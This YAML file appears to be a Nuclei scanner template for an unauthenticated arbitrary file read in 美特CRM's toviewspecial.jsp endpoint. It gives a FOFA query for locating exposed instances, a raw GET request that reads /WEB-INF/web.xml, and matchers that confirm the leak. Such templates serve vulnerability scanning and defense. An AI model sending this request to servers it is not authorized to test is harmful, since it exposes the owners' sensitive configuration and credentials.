id: meiteCRM-toviewspecial_jsp-File-reading

info:
  name: 美特CRM toviewspecial.jsp 任意文件读取漏洞
  author: Superhero
  severity: high
  description: |-
    fofa: body="/common/scripts/basic.js"
    美特CRM toviewspecial.jsp 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
  reference:
    - https://mp.weixin.qq.com/s/RbaGHr1beOHNji2hdx5mKg
  tags: File reading

http:
  - raw:
      - |
        GET /business/common/toviewspecial.jsp?view=/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<?xml version='
          - '<web-app'
          - '</web-app>'
          - '<servlet>'
          - '</servlet>'
        condition: and
      - type: status
        status: 
          - 200